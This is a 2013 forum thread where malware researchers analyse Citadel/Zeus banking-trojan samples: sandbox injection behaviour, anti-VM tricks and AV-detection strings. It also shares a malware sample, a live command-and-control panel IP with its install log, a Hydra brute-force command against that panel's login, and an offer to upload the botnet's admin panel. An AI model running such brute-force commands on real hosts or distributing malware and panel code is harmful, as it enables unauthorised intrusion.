A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17588  by EP_X0FF
 Fri Jan 04, 2013 11:10 am
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably it activity restricted by sandbox. Why you want to run malware in VM + Sandboxie?
 #17589  by Buster_BSA
 Fri Jan 04, 2013 12:05 pm
Cassiel wrote:@ EP_X0FF

I have run the sample in my VM and I noticed some strange things. If I run it outside BSA it will set the autorun part, if I run it inside BSA it won't.
There are the "usual" registry changes but there is nothing being added to the run key. It is like it puts itself to sleep and then can no longer continue.
Probably the malware is injecting code to a system process and then setting autorun part from there. As Sandboxie does not allow injection to processes running outside the sandbox, the process will fail so autorun too.
Last edited by Buster_BSA on Fri Jan 04, 2013 2:33 pm, edited 1 time in total.
 #17590  by Cassiel
 Fri Jan 04, 2013 12:40 pm
@ EP_X0FF

Well my idea was to use a VM with BSA in order to have a snapshot if things went wrong.
I tried cuckoo also however I like the reporting from BSA a lot more then cuckoo.

@ Buster_BSA

You are most likely right, I am going to check this with procmon in order to see how the registry keyis being set.


EDIT:

You are right, it is injecting into explorer and after that it is creating the autorun key.
 #17594  by Buster_BSA
 Fri Jan 04, 2013 2:32 pm
Cassiel wrote:You are right, it is injecting into explorer and after that it is creating the autorun key.
I would like such injections were being sucessfully done so BSA analysis can be more complete, but the thing depends on Sandboxie´s restrictions. I am going to talk with Ronen about this and I will ask him if there is any workaround to solve the issue.
 #17787  by bsteo
 Mon Jan 21, 2013 10:10 am
Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM and anti-AVS functions, couldn't run it under Comodo and didn't try manually, maybe someone will do.
Attachments
password: "infected"
(114.78 KiB) Downloaded 109 times
 #17789  by EP_X0FF
 Mon Jan 21, 2013 2:36 pm
exitthematrix wrote:Citadel 1.3.5.1 Rain Edition sample. It have some anti-VM
Not found. Except lame trick with GetKeyboardLayoutList (patch two bytes @00418FC6 with nops) and another lame trick with
Code: Select all
ROOT\SECURITYCENTERROOT\SECURITYCENTER2 SELECT * FROM%sWQL
Antivirus Product company Name display Name version Number Unknown Company:%s
Product:%s
Version:%s
Firewall Product 
Software\Microsoft\Windows\CurrentVersion\Uninstall
Publisher Display Name Display Version%u:%s|%s|%s
Code: Select all
SafenSoft SysWatch  McAfee  McAfee Security Center  McAfee SecurityCenter   Symantec Client   Symantec Protection   Symantec Shared   Symantec Security   Norton Protection   Kaspersky Security  Kaspersky Anti-Virus  avast! Antivirus  AntiVir Desktop   AVG Monitor   AVG Service   AVG Security  ESET Security   ESET Antivirus  Microsoft Inspection  Microsoft Malware   Microsoft Security
+ http://www.kernelmode.info/forum/viewto ... 553#p17553

Patched Zeus result (full disclosure).
http://camas.comodo.com/cgi-bin/submit? ... f9856e4263

No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
 #17794  by Xylitol
 Mon Jan 21, 2013 5:08 pm
Code: Select all
• dns: 1 ›› ip: 62.109.1.7 - adresse: CITAB-TEST.TK
http://62.109.1.7/net/panel.php?m=login
Code: Select all
http://62.109.1.7/net/install/
• [0] - Connecting to MySQL as 'citab-test'.
• [0] - Selecting DB 'citab-test'.
• [0] - Updating table 'botnet_list'.
• [0] - Creating table 'botnet_reports'.
• [0] - Updating table 'botnet_reports_130119'.
• [0] - Filling table 'ipv4toc'.
• [0] - Creating table 'ipv4toc'.
• [3] - Updating table 'cp_users'.
• [3] - Updating table 'botnet_scripts'.
• [3] - Updating table 'botnet_scripts_stat'.
• [3] - Updating table 'botnet_software_stat'.
• [3] - Updating table 'exe_updates'.
• [3] - Updating table 'exe_updates_crypter'.
• [3] - Updating table 'accparse_rules'.
• [3] - Updating table 'accparse_accounts'.
• [3] - Updating table 'vnc_bot_connections'.
• [3] - Updating table 'jabber_messages'.
• [3] - Updating table 'botnet_screenshots'.
• [3] - Updating table 'botnet_rep_favorites'.
• [3] - Updating table 'botnet_activity'.
• [3] - Updating table 'botnet_webinjects_group'.
• [3] - Updating table 'botnet_webinjects_group_perms'.
• [3] - Updating table 'botnet_webinjects'.
• [3] - Updating table 'botnet_webinjects_bundle'.
• [3] - Updating table 'botnet_webinjects_bundle_execlim'.
• [3] - Updating table 'botnet_webinjects_bundle_members'.
• [3] - Updating table 'botnet_webinjects_history'.
• [3] - Creating folder '_logos'.
• [3] - Writing config file
• [3] - Searching for the god particle...
• [3] - Creating folder 'system/data'.
• [3] - Creating folder 'public'.
• [3] - Creating folder 'files'.
• [3] - Creating folder 'files/webinjects'.
-- Update complete! --
EP_X0FF wrote:No matter how it named - zeus, ice-ix, citadel it all the same slavik shit.
Code: Select all
-l admin -P pwd.lst -s 80 -w 64 -f -V 62.109.1.7 http-post-form "/net/panel.php?m=login:user=admin&pass=^PASS^:Bad user name or password."
And it's the same command for bruteforce Zeus, Ice9, Citadel.
 #17797  by bsteo
 Mon Jan 21, 2013 6:59 pm
If someone needs the PHP Admin Panel of this slavik mod shit let me know I can upload it.
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 20